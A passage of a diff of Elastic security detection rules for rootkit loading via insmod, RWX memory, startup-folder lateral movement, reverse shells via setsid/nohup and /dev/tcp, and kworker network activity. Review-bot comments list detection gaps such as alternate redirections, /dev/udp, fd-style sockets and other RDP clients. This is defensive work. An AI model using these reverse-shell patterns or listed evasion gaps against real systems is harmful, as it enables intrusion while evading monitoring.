@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Module Load via insmod", + "note": "## Triage and analysis\n\n### Investigating Kernel module load via insmod\n\nThe insmod binary is a Linux utility that allows users with root privileges to load kernel modules, which are object files that extend the functionality of the kernel. \n\nThreat actors can abuse this utility to load rootkits, granting them full control over the system and the ability to evade security products.\n\nThe detection rule 'Kernel module load via insmod' is designed to identify instances where the insmod binary is used to load a kernel object file (with a .ko extension) on a Linux system. This activity is uncommon and may indicate suspicious or malicious behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n### Possible investigation steps\n\n- Investigate the kernel object file that was loaded via insmod.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n- Investigate the kernel ring buffer for any warnings or messages, such as tainted or out-of-tree kernel module loads through `dmesg`.\n- Investigate syslog for any unusual segfaults or other messages. Rootkits may be installed on targets with different architecture as expected, and could potentially cause segmentation faults. \n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - $osquery_6\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Kernel Driver Load - 3e12a439-d002-4944-bc42-171c0dcb9b96\n- Tainted Out-Of-Tree Kernel Module Load - 51a09737-80f7-4551-a3be-dac8ef5d181a\n- Tainted Kernel Module Load - 05cad2fb-200c-407f-b472-02ea8c9e5e4a\n- Attempt to Clear Kernel Ring Buffer - 2724808c-ba5d-48b2-86d2-0002103df753\n- Enumeration of Kernel Modules via Proc - 80084fa9-8677-4453-8680-b891d3c0c778\n- Suspicious Modprobe File Event - 40ddbcc8-6561-44d9-afc8-eefdbfe0cccd\n- Kernel Module Removal - cd66a5af-e34b-4bb0-8931-57d0a043f2ef\n- Enumeration of Kernel Modules - 2d8043ed-5bda-4caf-801c-c1feb7410504\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and process.name == \"insmod\" and process.args : \"*.ko\"\n", + "references": [ + "https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2339f03c-f53f-40fa-834b-40c5983fc41f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Rootkit", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2339f03c-f53f-40fa-834b-40c5983fc41f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json b/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json deleted file mode 100644 index 7f9153e4c00..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json +++ /dev/null 
@@ -1,79 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Discovery of files created by a remote host on sensitive directories and folders. Remote file creation in these directories could indicate a malicious binary or script trying to compromise the system.", - "from": "now-10m", - "index": [ - "logs-endpoint.events.*" - ], - "interval": "5m", - "language": "eql", - "license": "Elastic License v2", - "name": "Remote File Creation on a Sensitive Directory", - "query": "file where (event.action == \"creation\" or event.action == \"modification\") and\nprocess.name:(\"System\", \"scp\", \"sshd\", \"smbd\", \"vsftpd\", \"sftp-server\") and not\nuser.name:(\"SYSTEM\", \"root\") and\n(file.path : (\"C*\\\\Users\\\\*\\\\AppData\\\\Roaming*\", \"C*\\\\Program*Files\\\\*\",\n \"C*\\\\Windows\\\\*\", \"C*\\\\Windows\\\\System\\\\*\",\n \"C*\\\\Windows\\\\System32\\\\*\", \"/etc/*\", \"/tmp*\",\n \"/var/tmp*\", \"/home/*/.*\", \"/home/.*\", \"/usr/bin/*\",\n \"/sbin/*\", \"/bin/*\", \"/usr/lib/*\", \"/usr/sbin/*\",\n \"/usr/share/*\", \"/usr/local/*\", \"/var/lib/dpkg/*\",\n \"/lib/systemd/*\"\n )\n)\n", - "references": [ - "https://www.elastic.co/es/blog/remote-desktop-protocol-connections-elastic-security" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "2377946d-0f01-4957-8812-6878985f515d", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "Use Case: Lateral Movement Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - 
"reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1210", - "name": "Exploitation of Remote Services", - "reference": "https://attack.mitre.org/techniques/T1210/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 1 - }, - "id": "2377946d-0f01-4957-8812-6878985f515d_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/23bcd283-2bc0-4db2-81d4-273fc051e5c0_1.json b/packages/security_detection_engine/kibana/security_rule/23bcd283-2bc0-4db2-81d4-273fc051e5c0_1.json new file mode 100644 index 00000000000..f6239999769 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/23bcd283-2bc0-4db2-81d4-273fc051e5c0_1.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of a previously unknown unix binary with read, write and execute memory region permissions. The mprotect() system call is used to change the access protections on a region of memory that has already been allocated. This syscall allows a process to modify the permissions of pages in its virtual address space, enabling or disabling permissions such as read, write, and execute for those pages. RWX permissions on memory is in many cases overly permissive, and should be analyzed thoroughly.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Unknown Execution of Binary with RWX Memory Region", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "event.category:process and host.os.type:linux and auditd.data.syscall:mprotect and auditd.data.a2:7\n", + "references": [ + "https://man7.org/linux/man-pages/man2/mprotect.2.html" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "23bcd283-2bc0-4db2-81d4-273fc051e5c0", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S mprotect\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "23bcd283-2bc0-4db2-81d4-273fc051e5c0_1", + "type": "security-rule" +} \ No newline at end of file 
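Review bot: The query `auditd.data.syscall:mprotect and auditd.data.a2:7` has no outcome condition, so an mprotect(PROT_READ|PROT_WRITE|PROT_EXEC) call that the kernel or an LSM rejects (for example a SELinux `execmem` denial) lands in the same new-terms bucket as one that succeeded; since every syscall audit record carries `success=`, consider `... and auditd.data.a2:7 and event.outcome:success` if auditd_manager populates `event.outcome` the way auditbeat's auditd module does (confirm, or reference the raw `auditd.result` field instead). The setup text prescribes only `-a always,exit -F arch=b64 -S mprotect`, so 32-bit processes on multilib hosts are never audited and can never reach this rule; add `-a always,exit -F arch=b32 -S mprotect` alongside it if such binaries are in scope. Mapping the detection to T1059.004 (Unix Shell) under-describes what is observed — an RWX region obtained via mprotect is closer to T1620 Reflective Code Loading or T1055 Process Injection — and the description would benefit from a false-positive sentence noting that some JIT runtimes (the JVM code cache, for instance) legitimately create RWX pages and will seed the seven-day new-terms baseline.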
diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_107.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_107.json new file mode 100644 index 00000000000..9793c8defba --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_107.json 
@@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Lateral Movement via Startup Folder", + "query": "file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n\n /* via RDP TSClient mounted share or SMB */\n (process.name : \"mstsc.exe\" or process.pid == 4) and\n\n file.path : (\"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\")\n", + "references": [ + "https://www.mdsec.co.uk/2017/06/rdpinception/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to 
@timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "25224a80-5a4a-4b8a-991e-6ab390465c4f_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_108.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_108.json new file mode 100644 index 00000000000..aee2fadbbe7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_108.json 
@@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Lateral Movement via Startup Folder", + "query": "file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n\n /* via RDP TSClient mounted share or SMB */\n (process.name : \"mstsc.exe\" or process.pid == 4) and\n\n file.path : (\"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\")\n", + "references": [ + "https://www.mdsec.co.uk/2017/06/rdpinception/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to 
@timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "25224a80-5a4a-4b8a-991e-6ab390465c4f_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_4.json b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_4.json new file mode 100644 index 00000000000..fae6bef4841 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_4.json 
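Review bot: The client-side branch `process.name : "mstsc.exe"` covers only the classic Microsoft RDP client, so a drive-redirected session from another client (Microsoft's newer `msrdc.exe` Remote Desktop client, or FreeRDP's `wfreerdp.exe`, both of which offer local-drive redirection — confirm for the builds in your estate) writes into the Startup folder without producing a match, even though it is the same RDPInception pattern the reference describes. Widening the list to `process.name : ("mstsc.exe", "msrdc.exe", "wfreerdp.exe")` leaves the `process.pid == 4` SMB branch untouched. The inline comment `/* via RDP TSClient mounted share or SMB */` slightly undersells that second branch: any write attributed to the System process (pid 4) matches, not only inbound SMB server writes, which is worth a word in the description so analysts do not read an alert as proof of an inbound SMB session.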
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of background processes with process arguments capable of opening a socket in the /dev/tcp channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via Background Process", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0>&1*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_4", + "type": "security-rule" +} \ No newline at end of file 
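Review bot: The argument pattern `process.args : "*/dev/tcp/*0>&1*"` requires the literal `0>&1` token after the `/dev/tcp/` path, so common variants that have exactly the same `setsid`/`nohup` + shell-parent shape — `0<&1`, its short form `<&1`, or a `/dev/udp/` target — produce no alert at all. The match can be widened without touching the rest of the query: `process.args : ("*/dev/tcp/*>&1*", "*/dev/tcp/*<&1*", "*/dev/udp/*>&1*", "*/dev/udp/*<&1*")`. The file-descriptor style (`exec 5<>/dev/tcp/host/port` followed by `<&5`/`>&5` redirections) never redirects to fd 1 and would still be missed; covering it means matching `*/dev/tcp/*` on its own and accepting the extra noise, a tuning decision the description should state either way so analysts know what the rule does not see.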
diff --git a/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_3.json b/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_3.json new file mode 100644 index 00000000000..3bfa83ab8ec --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_3.json 
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for network connections from a kworker process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process.", + "from": "now-60m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Network Activity Detected via Kworker", + "new_terms_fields": [ + "host.id", + "process.name", + "destination.ip" + ], + "query": "host.os.type:linux and event.category:network and event.action:(connection_attempted or connection_accepted) and \nprocess.name:kworker* and not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.168.0.0/16 or\n 224.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + 